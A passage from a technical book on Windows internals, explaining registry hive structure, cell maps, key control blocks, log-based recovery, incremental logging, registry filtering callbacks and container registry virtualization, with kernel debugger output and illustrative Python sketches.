Big Value cell | CM_BIG_DATA | A cell that represents a registry value bigger than 16 kB. For this kind of cell type, the cell content is an array of cell indexes, each pointing to a 16-kB cell that contains a chunk of the registry value.
Subkey-list cell | CM_KEY_INDEX | A cell composed of a list of cell indexes for key cells that are all subkeys of a common parent key.
Value-list cell | CM_KEY_INDEX | A cell composed of a list of cell indexes for value cells that are all values of a common parent key.
Security-descriptor cell | CM_KEY_SECURITY | A cell that contains a security descriptor. Security-descriptor cells include a signature (ks) at the head of the cell and a reference count that records the number of key nodes that share the security descriptor. Multiple key cells can share security-descriptor cells.
By using bins, instead of cells, to track active parts of the registry, Windows minimizes some management chores. For example, the system usually allocates and deallocates bins less frequently than it
does cells, which lets the configuration manager manage memory more efficiently. When the configu-
ration manager reads a registry hive into memory, it reads the whole hive, including empty bins, but it
can choose to discard them later. When the system adds and deletes cells in a hive, the hive can contain
empty bins interspersed with active bins. This situation is similar to disk fragmentation, which occurs
when the system creates and deletes files on the disk. When a bin becomes empty, the configuration
manager joins to the empty bin any adjacent empty bins to form as large a contiguous empty bin as
possible. The configuration manager also joins adjacent deleted cells to form larger free cells. (The con-
figuration manager shrinks a hive only when bins at the end of the hive become free. You can compact
the registry by backing it up and restoring it using the Windows RegSaveKey and RegReplaceKey func-
tions, which are used by the Windows Backup utility. Furthermore, the system compacts the bins at hive
initialization time using the Reorganization algorithm, as described later.)
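The block- and bin-granular sizing rules described above can be sketched as follows. This is illustrative arithmetic, not configuration manager code, and it ignores the cell and bin headers:

```python
BLOCK_SIZE = 4096  # registry block size (4 KB)

def round_up(n, granularity):
    # Round n up to the next multiple of granularity (ceiling division).
    return -(-n // granularity) * granularity

def bin_size(new_cell_bytes, page_size=4096):
    # A bin is the size of the new cell rounded up to the next block or
    # page boundary, whichever is higher; the space between the end of
    # the cell and the end of the bin becomes free space for other cells.
    return max(round_up(new_cell_bytes, BLOCK_SIZE),
               round_up(new_cell_bytes, page_size))
```

For example, a 100-byte cell that forces the hive to grow produces a 4096-byte bin, and the remainder becomes free space available for later cell allocations.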
The links that create the structure of a hive are called cell indexes. A cell index is the offset of a cell
into the hive file minus the size of the base block. Thus, a cell index is like a pointer from one cell to an-
other cell that the configuration manager interprets relative to the start of a hive. For example, as you
saw in Table 10-6, a cell that describes a key contains a field specifying the cell index of its parent key; a
cell index for a subkey specifies the cell that describes the subkeys that are subordinate to the specified
subkey. A subkey-list cell contains a list of cell indexes that refer to the subkey’s key cells. Therefore, if
you want to locate, for example, the key cell of subkey A whose parent is key B, you must first locate the
cell containing key B’s subkey list using the subkey-list cell index in key B’s cell. Then you locate each of
key B’s subkey cells by using the list of cell indexes in the subkey-list cell. For each subkey cell, you check
to see whether the subkey’s name, which a key cell stores, matches the one you want to locate—in this
case, subkey A.
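The lookup walk just described (key B's cell, to B's subkey-list cell, to each subkey's key cell) can be mimicked with a toy in-memory hive. The cell layout and field names here are invented for illustration and are not the real CM_ structures:

```python
# Cells keyed by cell index (the hive-file offset minus the base block).
toy_hive = {
    0x020: {"kind": "key",  "name": "B", "subkey_list": 0x080},
    0x080: {"kind": "list", "entries": [0x0A0, 0x0C0]},
    0x0A0: {"kind": "key",  "name": "A", "subkey_list": None},
    0x0C0: {"kind": "key",  "name": "C", "subkey_list": None},
}

def lookup_subkey(cells, parent_index, wanted):
    # Follow the parent key cell to its subkey-list cell, then check each
    # referenced key cell's name (registry names are case-insensitive).
    subkey_list = cells[cells[parent_index]["subkey_list"]]
    for idx in subkey_list["entries"]:
        if cells[idx]["name"].upper() == wanted.upper():
            return idx
    return None
```

Here, looking up subkey A under key B follows cell index 0x020 to the subkey-list cell at 0x080 and returns A's key cell index, 0x0A0.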
The distinction between cells, bins, and blocks can be confusing, so let’s look at an example of a
simple registry hive layout to help clarify the differences. The sample registry hive file in Figure 10-3
contains a base block and two bins. The first bin is empty, and the second bin contains several cells.
Logically, the hive has only two keys: the root key Root and a subkey of Root, Sub Key. Root has two val-
ues, Val 1 and Val 2. A subkey-list cell locates the root key’s subkey, and a value-list cell locates the root
key’s values. The free spaces in the second bin are empty cells. Figure 10-3 doesn’t show the security
cells for the two keys, which would be present in a hive.
FIGURE 10-3 Internal structure of a registry hive. (The figure shows a base block, an empty bin, and a second bin containing the Root and Sub Key key cells, the Val 1 and Val 2 value cells, a subkey-list cell, a value-list cell, and free space, with block boundaries marked.)
To optimize searches for both values and subkeys, the configuration manager sorts subkey-list cells
alphabetically. The configuration manager can then perform a binary search when it looks for a subkey
within a list of subkeys. The configuration manager examines the subkey in the middle of the list, and
if the name of the subkey the configuration manager is looking for alphabetically precedes the name
of the middle subkey, the configuration manager knows that the subkey is in the first half of the subkey
list; otherwise, the subkey is in the second half of the subkey list. This splitting process continues until
the configuration manager locates the subkey or finds no match. Value-list cells aren’t sorted, however,
so new values are always added to the end of the list.
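The binary search over a sorted subkey list can be sketched with Python's bisect module, assuming (as the text implies for registry names) a case-insensitive ordering:

```python
import bisect

def find_subkey(sorted_subkeys, name):
    # sorted_subkeys must already be sorted case-insensitively, as the
    # configuration manager keeps subkey-list cells sorted. Returns the
    # index of the match in the list, or None when there is no match.
    keys = [k.upper() for k in sorted_subkeys]
    target = name.upper()
    i = bisect.bisect_left(keys, target)
    if i < len(keys) and keys[i] == target:
        return i
    return None
```

Building the uppercased list makes this sketch O(n); the real implementation compares names in place during the binary search, so only O(log n) comparisons are performed.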
Cell maps
If hives never grew, the configuration manager could perform all its registry management on the in-
memory version of a hive as if the hive were a file. Given a cell index, the configuration manager could
calculate the location in memory of a cell simply by adding the cell index, which is a hive file offset, to
the base of the in-memory hive image. Early in the system boot, this process is exactly what Winload
does with the SYSTEM hive: Winload reads the entire SYSTEM hive into memory as a read-only hive and
adds the cell indexes to the base of the in-memory hive image to locate cells. Unfortunately, hives grow
as they take on new keys and values, which means the system must allocate new reserved views and
extend the hive file to store the new bins that contain added keys and values. The reserved views that
keep the registry data in memory aren’t necessarily contiguous.
To deal with noncontiguous memory addresses referencing hive data in memory, the configura-
tion manager adopts a strategy similar to what the Windows memory manager uses to map virtual
memory addresses to physical memory addresses. While a cell index is only an offset in the hive file, the
configuration manager employs a two-level scheme, which Figure 10-4 illustrates, when it represents
the hive using the mapped views in the registry process. The scheme takes as input a cell index (that is,
a hive file offset) and returns as output both the address in memory of the block the cell index resides
in and the address in memory of the block the cell resides in. Remember that a bin can contain one or
more blocks and that hives grow in bins, so Windows always represents a bin with a contiguous region
of memory. Therefore, all blocks within a bin occur within the same 2-MB hive’s mapped view.
FIGURE 10-4 Structure of a cell index. (The figure shows a 32-bit cell index divided into a directory index, a table index, and a byte offset; the directory index selects one of 1024 entries in the hive's cell map directory, the table index selects one of 512 entries in a cell map table, and the byte offset locates the cell within the target block.)
To implement the mapping, the configuration manager divides a cell index logically into fields, in
the same way that the memory manager divides a virtual address into fields. Windows interprets a
cell index’s first field as an index into a hive’s cell map directory. The cell map directory contains 1024
entries, each of which refers to a cell map table that contains 512 map entries. An entry in this cell map
table is specified by the second field in the cell index. That entry locates the bin and block memory ad-
dresses of the cell.
In the final step of the translation process, the configuration manager interprets the last field of the
cell index as an offset into the identified block to precisely locate a cell in memory. When a hive initial-
izes, the configuration manager dynamically creates the mapping tables, designating a map entry for
each block in the hive, and it adds and deletes tables from the cell directory as the changing size of the
hive requires.
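The two-level translation described above can be sketched in Python. The field widths are derived from the structures in the text (a 1024-entry cell map directory, 512-entry cell map tables, and a byte offset within a 4-KB block); the exact bit layout, including the meaning of the top bit, is an illustrative assumption rather than the documented format.

```python
def split_cell_index(cell_index):
    """Split a 32-bit cell index into the fields used for translation."""
    volatile  = (cell_index >> 31) & 0x1    # storage type (assumed top bit)
    dir_index = (cell_index >> 21) & 0x3FF  # 1024 cell map directory entries
    tbl_index = (cell_index >> 12) & 0x1FF  # 512 cell map table entries
    offset    = cell_index & 0xFFF          # byte offset into the 4-KB block
    return volatile, dir_index, tbl_index, offset

def translate(cell_map_directory, cell_index):
    """Walk directory -> table -> block, as the configuration manager does."""
    _, d, t, off = split_cell_index(cell_index)
    table = cell_map_directory[d]       # cell map table for this directory slot
    block_address = table[t]            # in-memory address of the target block
    return block_address + off          # in-memory address of the cell
```

For example, the cell index 0x64e598 decodes to directory entry 3, table entry 78, and byte offset 0x598 under this assumed layout.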
Hive reorganization
As with real file systems, registry hives suffer from fragmentation: when cells in a bin are freed
and cannot be coalesced in a contiguous manner, small fragmented chunks of free
space are left in various bins. If there is not enough contiguous space available for new cells, new
bins are appended at the end of the hive file, while the fragmented ones are rarely repurposed. To
overcome this problem, starting from Windows 8.1, every time the configuration manager mounts a
hive file, it checks whether a hive’s reorganization needs to be performed. The configuration manager
records the time of the last reorganization in the hive’s basic block. If the hive has valid log files, is not
volatile, and if the time passed after the previous reorganization is greater than seven days, the reor-
ganization operation is started. The reorganization is an operation that has two main goals: shrink the
hive file and optimize it. It starts by creating a new empty hive that is identical to the original one but
does not contain any cells. The clone is used to copy the root key of the original hive, with
all its values (but no subkeys). A complex algorithm then analyzes all the child keys: during its normal
activity, the configuration manager records whether a particular key is accessed, and, if so, stores an
index representing the current runtime phase of the operating system (Boot or normal) in its key cell.
The reorganization algorithm first copies the keys accessed during the normal execution of the OS,
then the ones accessed during the boot phase, and finally the keys that have not been accessed at all
(since the last reorganization). This operation groups all the different keys in contiguous bins of the hive
file. The copy operation, by definition, produces a nonfragmented hive file (each cell is stored sequentially
in its bin, and new bins are always appended at the end of the file). Furthermore, the new hive stores
hot and cold classes of keys in large contiguous chunks, which makes reading registry data
during both the boot and runtime phases of the operating system much quicker.
The reorganization algorithm resets the access state of all the newly copied cells. In this way, the
system can track the hive's key usage starting again from a neutral state. The new usage statistics will
be consumed by the next reorganization, which will start after seven days. The configuration manager
stores the results of a reorganization cycle in the HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Configuration Manager\Defrag registry key, as shown in Figure 10-5. In the sample screenshot, the last reorganization ran on April 10, 2019, and saved 10 MB of fragmented hive space.
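The copy order used by the reorganization can be sketched as follows; the access-state tags and the key representation are illustrative stand-ins for the real key-cell metadata.

```python
# Keys accessed at normal runtime are copied first, then boot-accessed
# keys, then keys untouched since the last reorganization.
ORDER = {"normal": 0, "boot": 1, "unaccessed": 2}

def reorganize(keys):
    """Return key names in the order they would be copied into the new
    hive, resetting each access state for the next seven-day cycle."""
    copied = sorted(keys, key=lambda k: ORDER[k["access"]])
    for k in copied:
        k["access"] = "unaccessed"   # reset the usage statistics
    return [k["name"] for k in copied]
```

Because the sort is stable, keys within the same class keep their relative order, which is enough to group hot and cold keys into contiguous bins.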
FIGURE 10-5 Registry reorganization data.
The registry namespace and operation
The configuration manager defines a key object type to integrate the registry’s namespace with the
kernel’s general namespace. The configuration manager inserts a key object named Registry into the
root of the Windows namespace, which serves as the entry point to the registry. Regedit shows key
names in the form HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet, but the Windows subsystem
translates such names into their object namespace form (for example, \Registry\Machine\System\
CurrentControlSet). When the Windows object manager parses this name, it encounters the key
object by the name of Registry first and hands the rest of the name to the configuration manager. The
configuration manager takes over the name parsing, looking through its internal hive tree to find the
desired key or value. Before we describe the flow of control for a typical registry operation, we need
to discuss key objects and key control blocks. Whenever an application opens or creates a registry key,
the object manager gives a handle with which to reference the key to the application. The handle cor-
responds to a key object that the configuration manager allocates with the help of the object manager.
By using the object manager’s object support, the configuration manager takes advantage of the
security and reference-counting functionality that the object manager provides.
For each open registry key, the configuration manager also allocates a key control block. A key
control block stores the name of the key, includes the cell index of the key node that the control block
refers to, and contains a flag that notes whether the configuration manager needs to delete the key
cell that the key control block refers to when the last handle for the key closes. Windows places all key
control blocks into a hash table to enable quick searches for existing key control blocks by name. A key
object points to its corresponding key control block, so if two applications open the same registry key,
each receives a key object, and both key objects point to a common key control block.
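The sharing of key control blocks can be sketched as follows; the structures are simplified stand-ins for the real kernel ones.

```python
class KeyControlBlock:
    """Minimal stand-in for a kernel key control block."""
    def __init__(self, name):
        self.name = name
        self.refcount = 0
        self.delete_on_close = False   # set when a caller deletes the key

kcb_table = {}   # hash table keyed by full key name

def open_key(name):
    """Return a 'key object' that points at a shared key control block."""
    kcb = kcb_table.get(name)
    if kcb is None:                    # first open of this key
        kcb = kcb_table[name] = KeyControlBlock(name)
    kcb.refcount += 1
    return {"kcb": kcb}                # the key object references the KCB
```

Two opens of the same path yield two distinct key objects whose `kcb` fields point at the same control block, mirroring the behavior described above.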
When an application opens an existing registry key, the flow of control starts with the applica-
tion specifying the name of the key in a registry API that invokes the object manager’s name-parsing
routine. The object manager, upon encountering the configuration manager’s registry key object in the
namespace, hands the path name to the configuration manager. The configuration manager performs
a lookup on the key control block hash table. If the related key control block is found there, there’s no
need for any further work (no registry process attach is needed); otherwise, the lookup provides the
configuration manager with the closest key control block to the searched key, and the lookup con-
tinues by attaching to the registry process and using the in-memory hive data structures to search
through keys and subkeys to find the specified key. If the configuration manager finds the key cell, the
configuration manager searches the key control block tree to determine whether the key is open (by
the same application or another one). The search routine is optimized to always start from the clos-
est ancestor with a key control block already opened. For example, if an application opens \Registry\
Machine\Key1\Subkey2, and \Registry\Machine is already open, the parse routine uses the key control
block of \Registry\Machine as a starting point. If the key is open, the configuration manager incre-
ments the existing key control block’s reference count. If the key isn’t open, the configuration manager
allocates a new key control block and inserts it into the tree. Then the configuration manager allocates
a key object, points the key object at the key control block, detaches from the Registry process, and
returns control to the object manager, which returns a handle to the application.
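The closest-ancestor optimization can be sketched as a longest-prefix search over the already-open key control blocks; the comparison by path component (rather than by raw characters) is an assumption for illustration.

```python
def closest_open_ancestor(open_kcbs, path):
    """Return the deepest open key that is an ancestor of (or equal to)
    `path`, or None if no ancestor key control block is open."""
    parts = path.lower().split("\\")
    best = None
    for name in open_kcbs:
        p = name.lower().split("\\")
        if parts[:len(p)] == p:                      # component-wise prefix
            if best is None or len(p) > len(best.split("\\")):
                best = name                          # deeper ancestor wins
    return best
```

With \Registry and \Registry\Machine open, a parse of \Registry\Machine\Key1\Subkey2 starts from \Registry\Machine, exactly as in the example above.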
When an application creates a new registry key, the configuration manager first finds the key cell
for the new key’s parent. The configuration manager then searches the list of free cells for the hive in
which the new key will reside to determine whether cells exist that are large enough to hold the new
key cell. If there aren’t any free cells large enough, the configuration manager allocates a new bin and
uses it for the cell, placing any space at the end of the bin on the free cell list. The new key cell fills with
pertinent information—including the key’s name—and the configuration manager adds the key cell to
the subkey list of the parent key’s subkey-list cell. Finally, the system stores the cell index of the parent
cell in the new subkey’s key cell.
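The free-cell search during key creation can be sketched as follows; the sizes and free-list representation are illustrative (bins are assumed to grow in 4-KB units, matching the block size).

```python
BIN_SIZE = 4096   # assumed bin granularity

def allocate_cell(free_list, size, hive_bins):
    """free_list: list of (offset, size) free cells; hive_bins: list of
    bin offsets. Both are mutated, as the hive structures would be."""
    for i, (off, free) in enumerate(free_list):
        if free >= size:                          # first fit
            del free_list[i]
            if free > size:                       # return the remainder
                free_list.append((off + size, free - size))
            return off
    # No free cell is large enough: append a new bin at the end of the
    # hive and place its leftover space on the free cell list.
    off = len(hive_bins) * BIN_SIZE
    hive_bins.append(off)
    free_list.append((off + size, BIN_SIZE - size))
    return off
```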
The configuration manager uses a key control block’s reference count to determine when to delete
the key control block. When all the handles that refer to a key in a key control block close, the reference
count becomes 0, which denotes that the key control block is no longer necessary. If an application that
calls an API to delete the key sets the delete flag, the configuration manager can delete the associated
key from the key’s hive because it knows that no application is keeping the key open.
EXPERIMENT: Viewing key control blocks
You can use the kernel debugger to list all the key control blocks allocated on a system with the
!reg openkeys command. Alternatively, if you want to view the key control block for a particular
open key, use !reg querykey:
0: kd> !reg querykey \Registry\machine\software\microsoft
Found KCB = ffffae08c156ae60 :: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT
Hive         ffffae08c03b0000
KeyNode      00000225e8c3475c
[SubKeyAddr]     [SubKeyName]
225e8d23e64      .NETFramework
225e8d24074      AccountsControl
225e8d240d4      Active Setup
225ec530f54      ActiveSync
225e8d241d4      Ads
225e8d2422c      Advanced INF Setup
225e8d24294      ALG
225e8d242ec      AllUserInstallAgent
225e8d24354      AMSI
225e8d243f4      Analog
225e8d2448c      AppServiceProtocols
225ec661f4c      AppV
225e8d2451c      Assistance
225e8d2458c      AuthHost
...

You can then examine a reported key control block with the !reg kcb command:

kd> !reg kcb ffffae08c156ae60
Key               : \REGISTRY\MACHINE\SOFTWARE\MICROSOFT
RefCount          : 1f
Flags             : CompressedName, Stable
ExtFlags          :
Parent            : 0xe1997368
KeyHive           : 0xe1c8a768
KeyCell           : 0x64e598 [cell index]
TotalLevels       : 4
DelayedCloseIndex : 2048
MaxNameLen        : 0x3c
MaxValueNameLen   : 0x0
MaxValueDataLen   : 0x0
LastWriteTime     : 0x1c42501:0x7eb6d470
KeyBodyListHead   : 0xe1034d70 0xe1034d70
SubKeyCount       : 137
ValueCache.Count  : 0
KCBLock           : 0xe1034d40
KeyLock           : 0xe1034d40
The Flags field indicates that the name is stored in compressed form, and the SubKeyCount
field shows that the key has 137 subkeys.
Stable storage
To make sure that a nonvolatile registry hive (one with an on-disk file) is always in a recoverable state,
the configuration manager uses log hives. Each nonvolatile hive has an associated log hive, which is a
hidden file with the same base name as the hive and a logN extension. To ensure forward progress, the
configuration manager uses a dual-logging scheme. There are potentially two log files: .log1 and .log2.
If, for any reason, .log1 was written but a failure occurred while writing dirty data to the primary log
file, the next time a flush happens, a switch to .log2 occurs with the cumulative dirty data. If that fails
as well, the cumulative dirty data (the data in .log1 and the data that was dirtied in between) is saved in
.log2. As a consequence, .log1 will be used again next time around, until a successful write operation is
done to the primary log file. If no failure occurs, only .log1 is used.
For example, if you look in your %SystemRoot%\System32\Config directory (and you have the
Show Hidden Files And Folders folder option selected and Hide Protected Operating System
Files unselected; otherwise, you won’t see any file), you’ll see System.log1, Sam.log1, and other .log1
and .log2 files. When a hive initializes, the configuration manager allocates a bit array in which each bit
represents a 512-byte portion, or sector, of the hive. This array is called the dirty sector array because a
bit set in the array means that the system has modified the corresponding sector in the hive in memory
and must write the sector back to the hive file. (A bit not set means that the corresponding sector is up
to date with the in-memory hive’s contents.)
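The dirty sector array can be sketched as a plain bitmap; marking a modification sets the bit of every 512-byte sector it overlaps.

```python
SECTOR = 512   # one bit per 512-byte portion of the hive

def mark_dirty(dirty_bits, file_offset, length):
    """Set the bit for every sector overlapped by the modified range."""
    first = file_offset // SECTOR
    last = (file_offset + length - 1) // SECTOR
    for s in range(first, last + 1):
        dirty_bits[s] = 1

def sectors_to_flush(dirty_bits):
    """Sectors the lazy flusher would turn into log entries."""
    return [i for i, bit in enumerate(dirty_bits) if bit]
```

A 100-byte modification at file offset 500, for instance, straddles a sector boundary and dirties sectors 0 and 1.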
When the creation of a new key or value or the modification of an existing key or value takes place, the
configuration manager notes the sectors of the primary hive that change and writes them in the hive’s
dirty sectors array in memory. Then the configuration manager schedules a lazy flush operation, or a log
sync. The hive lazy writer system thread wakes up one minute after the request to synchronize the hive’s
log. It generates new log entries from the in-memory hive sectors referenced by valid bits of the dirty
sectors array and writes them to the hive log files on disk. At the same time, the system flushes all the reg-
istry modifications that take place between the time a hive sync is requested and the time the hive sync
occurs. The lazy writer uses low priority I/Os and writes dirty sectors to the log file on disk (and not to the
primary hive). When a hive sync takes place, the next hive sync occurs no sooner than one minute later.
If the lazy writer simply wrote all a hive’s dirty sectors to the hive file and the system crashed in mid-
operation, the hive file would be in an inconsistent (corrupted) and unrecoverable state. To prevent
such an occurrence, the lazy writer first dumps the hive’s dirty sector array and all the dirty sectors to
the hive’s log file, increasing the log file’s size if necessary. A hive’s basic block contains two sequence
numbers. After the first flush operation (and not in subsequent flushes), the configuration manager
updates one of the sequence numbers, which becomes greater than the other. Thus, if the system
crashes during the write operations to the hive, at the next reboot the configuration manager notices
that the two sequence numbers in the hive’s base block don’t match. The configuration manager can
update the hive with the dirty sectors in the hive’s log file to roll the hive forward. The hive is then up
to date and consistent.
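The recovery decision at load time reduces to comparing the two sequence numbers, which the following sketch illustrates (the hive and log representations are simplified).

```python
def recover(base_block, log_entries, hive_sectors):
    """Roll the hive forward from the log only if the base block shows
    an interrupted sync (mismatched sequence numbers)."""
    if base_block["seq1"] == base_block["seq2"]:
        return False                         # clean hive: nothing to do
    for sector, data in log_entries:         # replay the logged sectors
        hive_sectors[sector] = data
    base_block["seq2"] = base_block["seq1"]  # hive is consistent again
    return True
```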
After writing log entries in the hive’s log, the lazy flusher clears the corresponding valid bits in the
dirty sector array but inserts those bits in another important vector: the unreconciled array. The latter
is used by the configuration manager to understand which log entries to write in the primary hive.
Thanks to the new incremental logging support (discussed later), the primary hive file is rarely written
during the runtime execution of the operating system. The hive’s sync protocol (not to be confused by
the log sync) is the algorithm used to write all the in-memory and in-log registry’s modifications to the
primary hive file and to set the two sequence numbers in the hive. It is indeed an expensive multistage
operation that is described later.
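The hand-off between the two arrays can be sketched as follows: the lazy flusher moves bits from the dirty array to the unreconciled array once the data is safely in the log, and the Reconciler later clears the unreconciled bits by writing those sectors to the primary file.

```python
def lazy_flush(dirty, unreconciled, log):
    """Turn dirty sectors into log entries; mark them unreconciled."""
    for i, bit in enumerate(dirty):
        if bit:
            log.append(i)          # log entry for this sector
            dirty[i] = 0
            unreconciled[i] = 1    # in the log, not yet in the primary

def reconcile(unreconciled, primary_writes):
    """Write unreconciled sectors to the primary hive file."""
    for i, bit in enumerate(unreconciled):
        if bit:
            primary_writes.append(i)
            unreconciled[i] = 0
```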
The Reconciler, which is another type of lazy writer system thread, wakes up once every hour, freez-
es up the log, and writes all the dirty log entries in the primary hive file. The reconciliation algorithm
knows which parts of the in-memory hive to write to the primary file thanks to both the dirty sectors
and unreconciled array. Reconciliation happens rarely, though. If a system crashes, the configuration
manager has all the information needed to reconstruct a hive, thanks to the log entries that have been
already written in the log files. Performing registry reconciliation only once per hour (or when the size
of the log exceeds a threshold, which depends on the size of the volume in which the hive resides) is a
big performance improvement. The only possible time window in which some data loss could happen
in the hive is between log flushes.
Note that reconciliation still does not update the second sequence number in the main hive file.
The two sequence numbers will be updated with an equal value only in the “validation” phase (another
form of hive flushing), which happens only at the hive’s unload time (when an application calls the
RegUnloadKey API), when the system shuts down, or when the hive is first loaded. This means that in
most of the lifetime of the operating system, the main registry hive is in a dirty state and needs its log
file to be correctly read.
The Windows Boot Loader also contains some code related to registry reliability. For example, it can
parse the System.log file before the kernel is loaded and do repairs to fix consistency. Additionally, in
certain cases of hive corruption (such as if a base block, bin, or cell contains data that fails consistency
checks), the configuration manager can reinitialize corrupted data structures, possibly deleting subkeys
in the process, and continue normal operation. If it must resort to a self-healing operation, it pops up a
system error dialog box notifying the user.
Incremental logging
As mentioned in the previous section, Windows 8.1 introduced a big improvement on the performance
of the hive sync algorithm thanks to incremental logging. Normally, cells in a hive file can be in four
different states:
■ Clean The cell's data is in the hive's primary file and has not been modified.
■ Dirty The cell's data has been modified but resides only in memory.
■ Unreconciled The cell's data has been modified and correctly written to a log file but isn't in the primary file yet.
■ Dirty and Unreconciled After the cell has been written to the log file, it has been modified again. Only the first modification is on the log file, whereas the last one resides in memory only.
The original pre-Windows 8.1 synchronization algorithm executed five seconds after one or
more cells were modified. The algorithm can be summarized in four steps:

1. The configuration manager writes all the modified cells signaled by the dirty vector in a single entry in the log file.
2. It invalidates the hive's base block (by incrementing one of the two sequence numbers so that it no longer matches the other).
3. It writes all the modified data to the primary hive's file.
4. It performs the validation of the primary hive (the validation sets the two sequence numbers to an identical value in the primary hive file).
To maintain the integrity and the recoverability of the hive, the algorithm should emit a flush opera-
tion to the file system driver after each phase; otherwise, corruption could happen. Flush operations on
random access data can be very expensive (especially on standard rotation disks).
Incremental logging solved the performance problem. In the legacy algorithm, one single log entry
was written containing all the dirty data between multiple hive validations; the incremental model
broke this assumption. The new synchronization algorithm writes a single log entry every time the
lazy flusher executes, which, as discussed previously, invalidates the primary hive's base block only
the first time it executes. Subsequent flushes continue to write new log entries without touching the
hive’s primary file. Every hour, or if the space in the log exhausts, the Reconciler writes all the data
stored in the log entries to the primary hive’s file without performing the validation phase. In this way,
space in the log file is reclaimed while maintaining the recoverability of the hive. If the system crashes
at this stage, the log contains original entries that will be reapplied at hive loading time; otherwise,
new entries are written starting at the beginning of the log, and, if the system crashes later, only the
new entries in the log are applied at hive load time.
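The difference in flush traffic between the two schemes can be put in rough numbers; the counts below simply follow the steps described in the text (four flushed phases per legacy sync versus one log write per lazy flush, plus reconciliations) and are a simplification, not a measurement.

```python
def legacy_flushes(n_syncs):
    """Log write, base-block invalidation, primary write, validation:
    each phase is followed by a file system flush."""
    return n_syncs * 4

def incremental_flushes(n_lazy_flushes, n_reconciliations):
    """One base-block invalidation the first time, one log write per
    lazy flush, one primary write per reconciliation; validation is
    deferred to unload and not counted here."""
    return 1 + n_lazy_flushes + n_reconciliations
```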
Figure 10-6 shows the possible crash situations and how they are managed by the incremental log-
ging scheme. In case A, the system has written new data to the hive in memory, and the lazy flusher
has written the corresponding entries in the log (but no reconciliation happened). When the system
restarts, the recovery procedure applies all the log entries to the primary hive and validates the hive file
again. In case B, the reconciler has already written the data stored in the log entries to the primary hive
before the crash (no hive validation happened). At system reboot, the recovery procedure reapplies the
existing log entries, but no modifications to the primary hive file are made. Case C shows a situation
similar to case B, but where a new entry has been written to the log after the reconciliation. In this case,
the recovery procedure writes only the last modification, which is not in the primary file.
FIGURE 10-6 Consequences of possible system crashes at different times. (Diagram, three panels: A. Non-reconciled invalid hive; B. Reconciled invalid hive; C. Reconciled invalid hive with new data. Each panel shows a primary hive whose base block carries mismatched sequence numbers, alongside its log file and the last valid log entry.)
The hive’s validation is performed only in certain (rare) cases. When a hive is unloaded, the system
performs reconciliation and then validates the hive’s primary file. At the end of the validation, it sets the
two sequence numbers of the hive’s primary file to a new identical value and emits the last file system
flush request before unloading the hive from memory. When the system restarts, the hive load code
detects that the primary hive is in a clean state (thanks to the two sequence numbers having the same
value) and does not start any form of hive recovery. Thanks to the new incremental
synchronization protocol, the operating system no longer suffers the performance penalties
brought by the old legacy logging protocol.
Note Loading a hive created by Windows 8.1 or a newer operating system in older machines
is problematic in case the hive’s primary file is in a non-clean state. The old OS (Windows 7,
for example) has no idea how to process the new log files. For this reason, Microsoft created
the RegHiveRecovery minifilter driver, which is distributed through the Windows Assessment
and Deployment Kit (ADK). The RegHiveRecovery driver uses Registry callbacks, which in-
tercept “hive load” requests from the system and determine whether the hive’s primary file
needs recovery and uses incremental logs. If so, it performs the recovery and fixes the hive’s
primary file before the system has a chance to read it.
Registry filtering
The configuration manager in the Windows kernel implements a powerful model of registry filtering,
which allows for monitoring of registry activity by tools such as Process Monitor. When a driver uses
the callback mechanism, it registers a callback function with the configuration manager. The configura-
tion manager executes the driver’s callback function before and after the execution of registry system
services so that the driver has full visibility and control over registry accesses. Antivirus products that
scan registry data for viruses or prevent unauthorized processes from modifying the registry are other
users of the callback mechanism.
Registry callbacks are also associated with the concept of altitudes. Altitudes are a way for differ-
ent vendors to register a “height” on the registry filtering stack so that the order in which the system
calls each callback routine can be deterministic and correct. This avoids a scenario in which an anti-
virus product would scan encrypted keys before an encryption product would run its own callback
to decrypt them. With the Windows registry callback model, both types of tools are assigned a base
altitude corresponding to the type of filtering they are doing—in this case, encryption versus scanning.
Secondly, companies that create these types of tools must register with Microsoft so that within their
own group, they will not collide with similar or competing products.
The filtering model also includes the ability to either completely take over the processing of the
registry operation (bypassing the configuration manager and preventing it from handling the request)
or redirect the operation to a different operation (such as WoW64’s registry redirection). Additionally,
it is also possible to modify the output parameters as well as the return value of a registry operation.
Finally, drivers can assign and tag per-key or per-operation driver-defined information for their own
purposes. A driver can create and assign this context data during a create or open operation, which the
configuration manager remembers and returns during each subsequent operation on the key.
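Altitude ordering can be sketched as a simple sort of the registered callbacks; the altitude values, and the assumption that pre-operation callbacks run from the highest altitude down, are illustrative.

```python
callbacks = []   # (altitude, driver name) pairs

def register_callback(altitude, name):
    """Register a filter at the given altitude, as a driver would through
    the registry callback mechanism."""
    callbacks.append((altitude, name))

def pre_operation_order():
    """Order in which pre-operation callbacks would be invoked."""
    return [name for _, name in sorted(callbacks, reverse=True)]
```

With an encryption filter registered above a scanner, the encryption callback runs first, avoiding the scenario described above in which a scanner would see encrypted data.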
Registry virtualization
Windows 10 Anniversary Update (RS1) introduced registry virtualization for Argon and Helium contain-
ers and the possibility to load differencing hives, which adhere to the new hive version 1.6. Registry
virtualization is provided by both the configuration manager and the VReg driver (integrated in the
Windows kernel). The two components provide the following services:
■ Namespace redirection An application can redirect the content of a virtual key to a real one in the host. The application can also redirect a virtual key to a key belonging to a differencing hive, which is merged to a root key in the host.
■ Registry merging Differencing hives are interpreted as a set of differences from a base hive. The base hive represents the Base Layer, which contains the Immutable registry view. Keys in a differencing hive can be an addition to the base one or a subtraction. The latter are called tombstone keys.
The configuration manager, at phase 1 of the OS initialization, creates the VRegDriver device
object (with a proper security descriptor that allows only SYSTEM and Administrator access) and
the VRegConfigurationContext object type, which represents the Silo context used for tracking the
namespace redirection and hive merging, which belongs to the container. Server silos have been cov-
ered already in Chapter 3, “Processes and jobs,” of Part 1.
Namespace redirection
Registry namespace redirection can be enabled only in a Silo container (both Server and applications
silos). An application, after it has created the silo (but before starting it), sends an initialization IOCTL
to the VReg device object, passing the handle to the silo. The VReg driver creates an empty configura-
tion context and attaches it to the Silo object. It then creates a single namespace node, which remaps
the \Registry\WC root key of the container to the host key because all containers share the same view
of it. The \Registry\WC root key is created for mounting all the hives that are virtualized for the silo
containers.
The VReg driver is a registry filter driver that uses the registry callbacks mechanism for properly
implementing the namespace redirection. The first time an application initializes a namespace redirection, the VReg driver registers its main RegistryCallback notification routine (through an internal API
similar to CmRegisterCallbackEx). To properly add namespace redirection to a root key, the application
